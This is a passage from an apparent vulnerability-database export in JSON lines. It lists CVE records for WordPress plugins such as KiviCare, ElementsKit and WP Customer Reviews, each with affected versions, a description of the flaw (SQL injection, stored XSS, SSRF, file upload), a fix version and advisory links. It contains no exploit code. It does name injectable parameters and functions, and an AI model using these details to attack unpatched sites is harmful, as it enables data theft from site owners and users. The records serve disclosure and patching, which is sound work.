version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fareharbor\\\/tags\\\/3.6.7\\\/fareharbor.php#L287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fareharbor\\\/tags\\\/3.6.7\\\/fareharbor.php#L287\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42ad6fef-4280-45db-a3e2-6d7522751fa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42ad6fef-4280-45db-a3e2-6d7522751fa7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25021","slug":"fareharbor","versionEndExcluding":"3.6.7","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in FareHarbor FareHarbor for WordPress plugin <=\u00a03.6.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fareharbor\\\/wordpress-fareharbor-for-wordpress-plugin-3-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fareharbor\\\/wordpress-fareharbor-for-wordpress-plugin-3-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7063","slug":"elementskit","versionImpact":"3.6.6","versionEndExcluding":"3.6.7","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.6 via the 'render_raw' function. This can allow authenticated attackers, with Contributor-level permissions and above, to extract sensitive data including private, future, and draft posts.","recommendation":"Update to version 3.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35dd18b-0f05-482f-aef3-08977cbec8a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35dd18b-0f05-482f-aef3-08977cbec8a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4648","slug":"wp-customer-reviews","versionImpact":"3.6.6","versionEndExcluding":"3.6.7","description":"The WP Customer Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 3.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81950be-de32-4fa1-94fe-42667414fe2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81950be-de32-4fa1-94fe-42667414fe2d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2965658\\\/wp-customer-reviews\\\/trunk?contextall=1&old=2882143&old_path=%2Fwp-customer-reviews%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2965658\\\/wp-customer-reviews\\\/trunk?contextall=1&old=2882143&old_path=%2Fwp-customer-reviews%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4686","slug":"wp-customer-reviews","versionEndExcluding":"3.6.7","description":"The WP Customer Reviews plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 3.6.6 via the ajax_enabled_posts function. This can allow authenticated attackers to extract sensitive data such as post titles and slugs, including those of protected and trashed posts and pages in addition to other post types such as galleries.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24b9984c-ec33-4492-815b-67a21ac4da0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24b9984c-ec33-4492-815b-67a21ac4da0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-customer-reviews\\\/trunk\\\/include\\\/admin\\\/wp-customer-reviews-3-admin.php?rev=2617376#L866\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-customer-reviews\\\/trunk\\\/include\\\/admin\\\/wp-customer-reviews-3-admin.php?rev=2617376#L866\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2965656\\\/wp-customer-reviews\\\/trunk?contextall=1&old=2882143&old_path=%2Fwp-customer-reviews%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2965656\\\/wp-customer-reviews\\\/trunk?contextall=1&old=2882143&old_path=%2Fwp-customer-reviews%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11724","slug":"gdpr-cookie-consent","versionImpact":"3.6.5","versionEndExcluding":"3.6.6","description":"The Cookie Consent for WP \u2013 Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpl_script_save AJAX action in all versions up to, and including, 3.6.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to whitelist scripts.","recommendation":"Update to version 3.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203552\\\/gdpr-cookie-consent\\\/tags\\\/3.6.6\\\/public\\\/modules\\\/script-blocker\\\/class-wpl-cookie-consent-script-blocker.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203552\\\/gdpr-cookie-consent\\\/tags\\\/3.6.6\\\/public\\\/modules\\\/script-blocker\\\/class-wpl-cookie-consent-script-blocker.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9a1de53-330f-49ab-a8f8-22753c62bd36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9a1de53-330f-49ab-a8f8-22753c62bd36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7064","slug":"elementskit","versionImpact":"3.6.5","versionEndExcluding":"3.6.6","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/181e6f3a-dbcf-44a6-b725-6325d9e56453?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/181e6f3a-dbcf-44a6-b725-6325d9e56453?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13532","slug":"small-package-quotes-purolator-edition","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The Small Package Quotes \u2013 Purolator Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-purolator-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-purolator-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L237\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-purolator-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L346\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-purolator-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L346\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/813fe9d2-913c-4e04-bcb7-443eef95c62e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/813fe9d2-913c-4e04-bcb7-443eef95c62e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4033","slug":"all-in-one-video-gallery","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The All-in-One Video Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the aiovg_create_attachment_from_external_image_url function in all versions up to, and including, 3.6.4. This makes it possible for authenticated attackers, with contributor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0f295f9-1090-4b10-abc5-3f73c5b4e28d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0f295f9-1090-4b10-abc5-3f73c5b4e28d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-video-gallery\\\/trunk\\\/includes\\\/functions.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-video-gallery\\\/trunk\\\/includes\\\/functions.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078876%40all-in-one-video-gallery%2Ftrunk&old=3072329%40all-in-one-video-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078876%40all-in-one-video-gallery%2Ftrunk&old=3072329%40all-in-one-video-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13478","slug":"ltl-freight-quotes-ups-edition","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The LTL Freight Quotes \u2013 TForce Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242156%40ltl-freight-quotes-ups-edition&new=3242156%40ltl-freight-quotes-ups-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242156%40ltl-freight-quotes-ups-edition&new=3242156%40ltl-freight-quotes-ups-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2403dd59-7b9e-490e-86d8-5a10f9eee616?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2403dd59-7b9e-490e-86d8-5a10f9eee616?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4664","slug":"wp-whatsapp","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The WP Chat App WordPress plugin before 3.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46ada0b4-f3cd-44fb-a568-3345e639bdb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46ada0b4-f3cd-44fb-a568-3345e639bdb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11730","slug":"kivicare-clinic-management-system","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'sort[]' parameter of the static_data_list AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with doctor\/receptionist-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCStaticDataController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCStaticDataController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30f2a3ee-7f95-478c-b3d7-c254b9472d42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30f2a3ee-7f95-478c-b3d7-c254b9472d42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11729","slug":"kivicare-clinic-management-system","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'service_list[0][service_id]' parameter of the get_widget_payment_options AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCBookAppointmentWidgetController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCBookAppointmentWidgetController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86632212-37b5-4280-8a2a-163957ad9787?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86632212-37b5-4280-8a2a-163957ad9787?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11728","slug":"kivicare-clinic-management-system","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCTaxController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCTaxController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53c18834-3026-4d4d-888b-add314a0e56e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53c18834-3026-4d4d-888b-add314a0e56e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3194","slug":"dokan-lite","versionImpact":"3.6.3","versionEndExcluding":"3.6.4","description":"The Dokan WordPress plugin before 3.6.4 allows vendors to inject arbitrary JavaScript in product reviews, which may allow them to run stored XSS attacks against other users such as site administrators.","recommendation":"Update to version 3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85e32913-dc2a-44c9-addd-7abde618e995\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85e32913-dc2a-44c9-addd-7abde618e995\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39545","slug":"wp-rest-api-authentication","versionImpact":"3.6.3","versionEndExcluding":"3.6.4","description":"Missing Authorization vulnerability in miniOrange WordPress REST API Authentication allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress REST API Authentication: from n\/a through 3.6.3.","recommendation":"Update to version 3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-rest-api-authentication\\\/vulnerability\\\/wordpress-wordpress-rest-api-authentication-3-6-3-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-rest-api-authentication\\\/vulnerability\\\/wordpress-wordpress-rest-api-authentication-3-6-3-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2326","slug":"pretty-link","versionImpact":"3.6.3","versionEndExcluding":"3.6.4","description":"The Pretty Links \u2013 Affiliate Links, Link Branding, Link Tracking & Marketing Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.3. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's configuration including stripe integration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97d78b4b-568e-43e7-bebf-091179c321f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97d78b4b-568e-43e7-bebf-091179c321f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049386%40pretty-link&new=3049386%40pretty-link&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049386%40pretty-link&new=3049386%40pretty-link&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2906","slug":"ct-real-estate-core","versionImpact":"3.6.3","versionEndExcluding":"3.6.4","description":"The Contempo Real Estate Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/contempothemes.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/contempothemes.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme\\\/12473778\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme\\\/12473778\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39c651c3-a478-4f58-af51-fd73d2934bdf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39c651c3-a478-4f58-af51-fd73d2934bdf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5530","slug":"ninja-forms","versionImpact":"3.6.33","versionEndExcluding":"3.6.34","description":"The Ninja Forms Contact Form WordPress plugin before 3.6.34 does not sanitize and escape its label fields, which could allow high privilege users such as admin to perform Stored XSS attacks. Only users with the unfiltered_html capability can perform this, and such users are already allowed to use JS in posts\/comments etc.; however, the vendor acknowledged and fixed the issue.","recommendation":"Update to version 3.6.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a642f313-cc3e-4d75-b207-1dceb6a7fbae\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a642f313-cc3e-4d75-b207-1dceb6a7fbae\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ninjaforms.com\\\/blog\\\/saturday-drive-x-edition\\\/\",\"name\":\"https:\\\/\\\/ninjaforms.com\\\/blog\\\/saturday-drive-x-edition\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4404","slug":"elementskit","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The ElementsKit PRO plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.6.2 via the 'render_raw' function. This can allow authenticated attackers, with contributor-level permissions and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6417269d-3d49-4f33-b92a-5aacb052bab0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6417269d-3d49-4f33-b92a-5aacb052bab0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0369","slug":"jet-engine","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The JetEngine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018list_tag\u2019 parameter in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/crocoblock.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetengine\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetengine\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f27979a8-0e68-4a45-9e3e-3667d88361d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f27979a8-0e68-4a45-9e3e-3667d88361d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12416","slug":"woomotiv","versionImpact":"3.6.1","versionEndExcluding":"3.6.3","description":"The Live Sales Notification for Woocommerce \u2013 Woomotiv plugin for WordPress is vulnerable to SQL Injection via the 'woomotiv_seen_products_.*' cookie in all versions up to, and including, 3.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#693\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#693\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#L521\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#L521\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#L614\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#L614\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82016921-4efb-47b4-9a75-45cae4ad80f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82016921-4efb-47b4-9a75-45cae4ad80f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0612","slug":"content-views-query-and-display-post-page","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The Content Views \u2013 Post Grid, Slider, Accordion (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024861\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024861\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4593","slug":"wp-register-profile-with-shortcode","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The WP Register Profile With Shortcode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.2 via the 'rp_user_data' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data from user meta like hashed passwords, usernames, and more.","recommendation":"Update to version 3.6.3, or a newer patched 